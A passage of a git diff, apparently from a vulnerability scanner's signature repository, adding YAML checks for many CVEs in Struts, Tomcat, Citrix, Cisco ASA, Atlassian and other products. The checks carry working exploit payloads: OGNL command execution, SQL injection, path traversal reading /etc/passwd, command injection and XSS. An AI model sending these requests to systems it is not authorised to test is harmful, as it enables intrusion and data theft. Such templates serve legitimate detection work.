text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - diff --git a/cves/apache-ofbiz-xss-cve-2020-9496.yaml b/cves/apache-ofbiz-xss-cve-2020-9496.yaml new file mode 100644 index 0000000..0802cc2 --- /dev/null +++ b/cves/apache-ofbiz-xss-cve-2020-9496.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-9496 +info: + name: Apache OFBiz XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + + +requests: + - method: POST + url: >- + {{.root}}webtools/control/xmlrpc + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Origin: http://{{.Host}} + - Content-Type: application/xml + data: JAELEScvebase + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: text/xml") && StringSearch("resBody", "No such service [JAELES]") && StringSearch("resBody", "faultString") && StringSearch("resBody", "methodResponse") + +references: + - https://www.cvebase.com/cve/2020/9496 diff --git a/cves/apache-struts-rce-cve-2013-2251.yaml b/cves/apache-struts-rce-cve-2013-2251.yaml new file mode 100644 index 0000000..3999bfc --- /dev/null +++ b/cves/apache-struts-rce-cve-2013-2251.yaml @@ -0,0 +1,31 @@ +id: CVE-2013-2251 +info: + name: Apache Struts 2 RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + index.action + login.action +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "uid=") + - method: GET + url: >- + {{.root}}{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "uid=") +references: + - https://www.cvebase.com/cve/2013/2251 diff --git a/cves/apache-struts-rce-cve-2017-5638.yaml b/cves/apache-struts-rce-cve-2017-5638.yaml new file mode 100644 index 0000000..b8f709b --- /dev/null +++ b/cves/apache-struts-rce-cve-2017-5638.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-5638 +info: + name: Apache Struts 2 RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data" + - Pragma: no-cache + - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* + + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase") +references: + - https://www.cvebase.com/cve/2017/5638 diff --git a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml new file mode 100644 index 0000000..2f5f6d5 --- /dev/null +++ b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml @@ -0,0 +1,23 @@ +id: CVE-2018-11759 +info: + name: Apache Tomcat JK Status Manager Exposed + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + jkstatus + jkstatus; +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "JK Status Manager") +references: + - https://www.cvebase.com/cve/2018/11759 diff --git a/cves/tomcat-open-redirect.yaml b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml similarity index 63% rename from cves/tomcat-open-redirect.yaml rename to cves/apache-tomcat-open-redirect-cve-2018-11784.yaml index a04046f..e522016 100644 --- a/cves/tomcat-open-redirect.yaml +++ b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml @@ -1,6 +1,6 @@ -id: cve-tomcat-04 +id: CVE-2018-11784 info: - name: Tomcat Open Redirect - CVE-2018-11784 + name: Apache Tomcat Open Redirect risk: High requests: @@ -12,7 +12,7 @@ requests: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- - StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}') + StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*') reference: - - link: https://github.com/breaktoprotect/CVE-2017-12615 \ No newline at end of file + - https://www.cvebase.com/cve/2018/11784 \ No newline at end of file diff --git a/cves/tomcat-put-method.yaml b/cves/apache-tomcat-put-cve-2017-12615.yaml similarity index 81% rename from cves/tomcat-put-method.yaml rename to cves/apache-tomcat-put-cve-2017-12615.yaml index 1c298ce..ae0275a 100644 --- a/cves/tomcat-put-method.yaml +++ b/cves/apache-tomcat-put-cve-2017-12615.yaml @@ -1,7 +1,6 @@ -# info to search signature -id: cve-tomcat-03 +id: CVE-2017-12615 info: - name: Tomcat PUT method allowed - CVE-2017-12615 + name: Tomcat PUT method allowed risk: High variables: @@ -29,4 +28,4 @@ requests: StatusCode() == 200 && StringSearch('response', 'JSP uploaded') reference: - - link: https://github.com/breaktoprotect/CVE-2017-12615 \ No newline at end of file + - https://www.cvebase.com/cve/2017/12615 \ No newline at end of file diff --git a/cves/apache-tomcat-rce-cve-2020-9484.yaml b/cves/apache-tomcat-rce-cve-2020-9484.yaml new file mode 100644 index 0000000..17308e8 --- /dev/null +++ b/cves/apache-tomcat-rce-cve-2020-9484.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-9484 +info: + name: Apache Tomcat RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy + detections: + - >- + StatusCode() == 500 && RegexSearch("resBody", "Exception") && RegexSearch("resBody", "ObjectInputStream") && RegexSearch("resBody", "PersistentManagerBase") + +references: + - https://www.cvebase.com/cve/2020/9484 diff --git a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml new file mode 100644 index 0000000..1658a6c --- /dev/null +++ b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-17506 +info: + name: Artica Web Proxy SQLi + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + (StatusCode() == 200 || StatusCode() == 301 || StatusCode() == 302) && StringSearch("resHeaders", "PHPSESSID") && StringSearch("resBody", "artica-applianc") + +references: + - https://www.cvebase.com/cve/2020/17506 diff --git a/cves/artifactory-improper-authorization-cve-2019-9733.yaml b/cves/artifactory-improper-authorization-cve-2019-9733.yaml new file mode 100644 index 0000000..c6cdd96 --- /dev/null +++ b/cves/artifactory-improper-authorization-cve-2019-9733.yaml @@ -0,0 +1,34 @@ +id: CVE-2019-9733 +info: + name: Artifactory Improper Authorization + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + artifactory/ui/auth/login +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?_spring_security_remember_me=false + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - X-Requested-With: artUI + - serial: 58 + - X-Forwarded-For: 127.0.0.1 + - Request-Agent: artifactoryUI + - Content-Type: application/json + - Origin: http://{{Hostname}} + - Referer: http://{{Hostname}}/artifactory/webapp/ + - Accept-Encoding: gzip, deflate + - Accept-Language: en-US,en;q=0.9 + - Connection: close + body: {"user":"access-admin","password":"password","type":"login"} + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"') + +references: + - https://www.cvebase.com/cve/2019/9733 diff --git a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml new file mode 100644 index 0000000..705d46d --- /dev/null +++ b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-3396 +info: + name: Atlassian Confluence Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/tinymce/1/macro/preview +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "contextConfigLocation") + +references: + - https://www.cvebase.com/cve/2019/3396 diff --git a/cves/atlassian-confluence-xss-cve-2018-5230.yaml b/cves/atlassian-confluence-xss-cve-2018-5230.yaml new file mode 100644 index 0000000..e7d7343 --- /dev/null +++ b/cves/atlassian-confluence-xss-cve-2018-5230.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-5230 +info: + name: Atlassian Confluence XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + pages/includes/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", 'SRC="javascript:alert(1337)">') +references: + - https://www.cvebase.com/cve/2018/5230 diff --git a/cves/atlassian-rce-cve-2019-11580.yaml b/cves/atlassian-rce-cve-2019-11580.yaml new file mode 100644 index 0000000..f9be9f7 --- /dev/null +++ b/cves/atlassian-rce-cve-2019-11580.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-11580 +info: + name: Atlassian Crowd Data Center RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + crowd/plugins/servlet/exp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?cmd=cat%20/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/11580 diff --git a/cves/cisco-asa-path-traversal-cve-2018-0296.yaml b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml new file mode 100644 index 0000000..502fd94 --- /dev/null +++ b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-0296 +info: + name: Cisco ASA Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + +CSCOU+/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "///sessions") +references: + - https://www.cvebase.com/cve/2018/0296 diff --git a/cves/cisco-asa-path-traversal-cve-2020-3187.yaml b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml new file mode 100644 index 0000000..406a1c0 --- /dev/null +++ b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-3187 +info: + name: Cisco ASA & FTD Path Traversal + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + +CSCOE+/session_password.html + +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resHeader", "webvpn") +references: + - https://www.cvebase.com/cve/2020/3187 diff --git a/cves/cisco-asa-lfi.yaml b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml similarity index 91% rename from cves/cisco-asa-lfi.yaml rename to cves/cisco-asa-path-traversal-cve-2020-3452.yaml index 037c240..1262c13 100644 --- a/cves/cisco-asa-lfi.yaml +++ b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml @@ -1,4 +1,4 @@ -id: cisco-asa-lfi +id: CVE-2020-3452 donce: true info: name: Cisco ASA - Unauthenticated LFI and Delete File (CVE-2020-3452) @@ -35,4 +35,5 @@ reference: - links: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 - https://twitter.com/aboul3la/status/1286012324722155525/photo/1 - - https://github.com/dinhbaouit/CISCO-Remove-File \ No newline at end of file + - https://github.com/dinhbaouit/CISCO-Remove-File + - https://www.cvebase.com/cve/2020/3452 \ No newline at end of file diff --git a/cves/cisco-dos-cve-2020-16139.yaml b/cves/cisco-dos-cve-2020-16139.yaml new file mode 100644 index 0000000..5e28628 --- /dev/null +++ b/cves/cisco-dos-cve-2020-16139.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-16139 +info: + name: Cisco DoS + risk: Low + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + localmenus.cgi +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") && StringSearch("resHeaders", "application/xml") + +references: + - https://www.cvebase.com/cve/2020/16139 diff --git a/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml new file mode 100644 index 0000000..bffdf95 --- /dev/null +++ b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-1653 +info: + name: Cisco RV320 RV326 Configuration Leak + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + cgi-bin/config.exp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "sysconfig") +references: + - https://www.cvebase.com/cve/2019/1653 diff --git a/cves/citrix-adc-lfi.yaml b/cves/citrix-adc-lfi-cve-2020-8193.yaml similarity index 96% rename from cves/citrix-adc-lfi.yaml rename to cves/citrix-adc-lfi-cve-2020-8193.yaml index 6abb964..33b3447 100644 --- a/cves/citrix-adc-lfi.yaml +++ b/cves/citrix-adc-lfi-cve-2020-8193.yaml @@ -1,4 +1,4 @@ -id: citrix-adc-lfi +id: CVE-2020-8193 single: true info: name: Citrix ADC LFI - CVE-2020-8193 @@ -58,3 +58,4 @@ reference: - links: - https://dmaasland.github.io/posts/citrix.html - https://support.citrix.com/article/CTX276688 + - https://www.cvebase.com/cve/2020/8193 diff --git a/cves/citrix-rce.yaml b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml similarity index 56% rename from cves/citrix-rce.yaml rename to cves/citrix-adc-path-traversal-cve-2019-19781.yaml index 54e7bc5..4599d61 100644 --- a/cves/citrix-rce.yaml +++ b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml @@ -1,14 +1,27 @@ -# info to search signature -id: citrix-rce-01 +id: CVE-2019-19781 info: - name: Citrix GateWay RCE (CVE-2019-19781) - risk: Critical + name: Citrix ADC Path Traversal + risk: High -requests: +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + vpn/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}../vpns/cfg/smb.conf + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "[global]") - method: POST redirect: false url: >- - {{.BaseURL}}/vpn/../vpns/portal/scripts/newbm.pl + {{.BaseURL}}{{.endpoint}}../vpns/portal/scripts/newbm.pl headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - NSC_USER: ../../../netscaler/portal/templates/somuniquestr @@ -19,11 +32,11 @@ requests: detections: - >- 1 == 0 - # checking if exploit works + # checking if exploit works - method: GET redirect: false url: >- - {{.BaseURL}}/vpn/../vpns/portal/somuniquestr.xml + {{.BaseURL}}{{.endpoint}}../vpns/portal/somuniquestr.xml headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - NSC_USER: nsroot @@ -31,6 +44,5 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("response", "root:") - -reference: - - link: https://support.citrix.com/article/CTX267027 \ No newline at end of file +references: + - https://www.cvebase.com/cve/2019/19781 diff --git a/cves/citrix-code-injection-cve-2020-8194.yaml b/cves/citrix-code-injection-cve-2020-8194.yaml new file mode 100644 index 0000000..07fa93b --- /dev/null +++ b/cves/citrix-code-injection-cve-2020-8194.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-8194 +info: + name: Citrix CDC & Gateway Code Injection + risk: High + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/x-www-form-urlencoded + - X-NITRO-USER: xpyZxwy6 + - Cookie: startupapp=st + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeaders", "application/x-java-jnlp-file") + +references: + - https://www.cvebase.com/cve/2020/8194 diff --git a/cves/citrix-lfi.yaml b/cves/citrix-lfi.yaml deleted file mode 100644 index ffaa065..0000000 --- a/cves/citrix-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -# info to search signature -id: netscaler-lfi-01 -info: - name: NetScaler LFI - CVE-2019-19781 - risk: High - -requests: - - method: GET - redirect: false - url: >- - {{.BaseURL}}/vpn/../vpns/cfg/smb.conf - headers: - - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "[global]") - -reference: - - link: https://support.citrix.com/article/CTX267027 diff --git a/cves/citrix-sharefile-lfi.yaml b/cves/citrix-path-traversal-cve-2020-7473.yaml similarity index 52% rename from cves/citrix-sharefile-lfi.yaml rename to cves/citrix-path-traversal-cve-2020-7473.yaml index b8937b4..74aa786 100644 --- a/cves/citrix-sharefile-lfi.yaml +++ b/cves/citrix-path-traversal-cve-2020-7473.yaml @@ -1,6 +1,6 @@ -id: citrix-share-lfi +id: CVE-2020-7473 info: - name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read - CVE-2020-7473 + name: Citrix ShareFile StorageZones Path Traversal risk: Potential confidence: Tentative @@ -17,6 +17,14 @@ requests: detections: - >- StatusCode() == 200 && StringSearch('body', 'bit app support') && StringSearch('body', 'extensions') - -reference: - - link: https://support.citrix.com/article/CTX269106 + - method: GET + redirect: false + url: >- + {{.root}}/UploadTest.aspx + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && ContentLength('body') == 0 && StringSearch('resHeader', 'Access-Control-Allow-Origin: *') +references: + - https://www.cvebase.com/cve/2020/7473 diff --git a/cves/citrix-reflected-xss-cve-2020-8191.yaml b/cves/citrix-reflected-xss-cve-2020-8191.yaml new file mode 100644 index 0000000..fb47ed1 --- /dev/null +++ b/cves/citrix-reflected-xss-cve-2020-8191.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-8191 +info: + name: Citrix ADC & Gateway Reflected XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: POST + url: >- + {{.root}}menu/stapp + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/x-www-form-urlencoded + - X-NITRO-USER: xpyZxwy6 + body: sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + +references: + - https://www.cvebase.com/cve/2020/8191 diff --git a/cves/citrix-sharefile-exposed.yaml b/cves/citrix-sharefile-exposed.yaml deleted file mode 100644 index 94a6800..0000000 --- a/cves/citrix-sharefile-exposed.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: citrix-share -info: - name: Citrix ShareFile Exposed - CVE-2020-7473 - risk: High - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/UploadTest.aspx - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && ContentLength('body') == 0 && StringSearch('resHeader', 'Access-Control-Allow-Origin: *') - -reference: - - link: https://support.citrix.com/article/CTX269106 diff --git a/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml new file mode 100644 index 0000000..d770689 --- /dev/null +++ b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-8982 +info: + name: Citrix ShareFile Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}}XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "bit app support") && StringSearch("resBody", "fonts") && StringSearch("resBody", "extensions") + +references: + - https://www.cvebase.com/cve/2020/8982 diff --git a/cves/comodo-utmc-rce-cve-2018-17431.yaml b/cves/comodo-utmc-rce-cve-2018-17431.yaml new file mode 100644 index 0000000..850a267 --- /dev/null +++ b/cves/comodo-utmc-rce-cve-2018-17431.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-17431 +info: + name: Comodo Unified Threat Management Console RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + manage/webshell/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}u?s==5&w=218&h=15&k=%0a&l=62&_=5621298674064 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "Configuration has been altered") + - method: GET + url: >- + {{.root}}{{.endpoint}}u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "Configuration has been altered") +references: + - https://www.cvebase.com/cve/2018/17431 diff --git a/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml new file mode 100644 index 0000000..48e78d2 --- /dev/null +++ b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-12314 +info: + name: Deltek Maconomy Path Traversal + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/12314 diff --git a/cves/emerge-rce-cve-2019-7256.yaml b/cves/emerge-rce-cve-2019-7256.yaml new file mode 100644 index 0000000..0541db7 --- /dev/null +++ b/cves/emerge-rce-cve-2019-7256.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-7256 +info: + name: eMerge E3 RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + + +requests: + - method: GET + url: >- + {{.root}}card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20cvebase.txt%60 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + - method: GET + url: >- + {{.root}}cvebase.txt + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + +references: + - https://www.cvebase.com/cve/2019/7256 diff --git a/cves/exacqvision-web-service-rce-cve-2020-9047.yaml b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml new file mode 100644 index 0000000..f6f0231 --- /dev/null +++ b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-9047 +info: + name: exacqVision Web Service RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}}version.web + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && (StringSearch("resBody", "3.10.4.72058") || StringSearch("resBody", "3.12.4.76544") || StringSearch("resBody", "3.8.2.67295") || StringSearch("resBody", "7.0.2.81005") || StringSearch("resBody", "7.2.7.86974") || StringSearch("resBody", "7.4.3.89785") || StringSearch("resBody", "7.6.4.94391") || StringSearch("resBody", "7.8.2.97826") || StringSearch("resBody", "8.0.6.105408") || StringSearch("resBody", 